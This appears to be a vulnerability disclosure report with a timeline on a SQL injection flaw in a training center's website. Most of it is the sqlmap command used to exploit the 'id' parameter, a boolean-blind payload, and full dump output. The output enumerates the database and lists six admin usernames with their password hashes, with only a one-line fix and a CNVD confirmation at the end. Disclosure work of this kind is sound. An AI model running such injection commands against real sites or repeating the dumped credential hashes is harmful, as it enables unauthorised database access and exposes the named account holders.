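2015-12-16: Details reported to the vendor; awaiting vendor handling
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and experts in related fields
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public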
SQL injection vulnerability on the main site of a management training center
URL: http://**.**.**.**/bh_news.display.php?id=620
$ python sqlmap.py -u "http://**.**.**.**/bh_news.display.php?id=620" -p id --technique=B --output-dir=output --random-agent --batch --no-cast -D pkufdc -T admin_user -C uname,upwd,flag,uid --dump
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=620 AND 4802=4802
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'pkufdc@%'
current user is DBA: False
database management system users [1]:
[*] 'pkufdc'@'%'

Database: pkufdc
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| n_article                             | 556     |
| n_class                               | 158     |
| n_tag                                 | 108     |
| zxbmb                                 | 18      |
| admin_user                            | 6       |
| webconfig                             | 1       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 399     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| CHARACTER_SETS                        | 36      |
| PARTITIONS                            | 36      |
| TABLES                                | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| KEY_COLUMN_USAGE                      | 8       |
| STATISTICS                            | 8       |
| TABLE_CONSTRAINTS                     | 8       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=620 AND 4802=4802
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5

Database: pkufdc
Table: admin_user
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | tinyint(4)   |
| uid    | int(11)      |
| uname  | varchar(20)  |
| upwd   | varchar(100) |
+--------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=620 AND 4802=4802
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5

Database: pkufdc
Table: admin_user
[6 entries]
+------------+----------------------------------+------+-----+
| uname      | upwd                             | flag | uid |
+------------+----------------------------------+------+-----+
| admin      | bf6343d07da915750209d813f4c1766f | 1    | 2   |
| zhaoxiaofa | e5ed2706eb1d704211240756e1eee728 | 1    | 3   |
| liulaoshi  | 04cfa571f81d3c1a2b12f49cc2332d64 | 1    | 4   |
| admin8     | ac9fd5dfa53d60d9346d7eb08c92993e | 1    | 5   |
| dom        | e5ed2706eb1d704211240756e1eee728 | 1    | 6   |
| ADMIN      | f6010169462a2b856ce8593eb027b134 | 1    | 7   |
+------------+----------------------------------+------+-----+
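Deploy a WAF.
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-12-18 11:53
CNVD has confirmed and reproduced the reported vulnerability and has passed it to CNCERT for dispatch to the Beijing branch center, which will follow up and coordinate handling with the organization that manages the website.
None yet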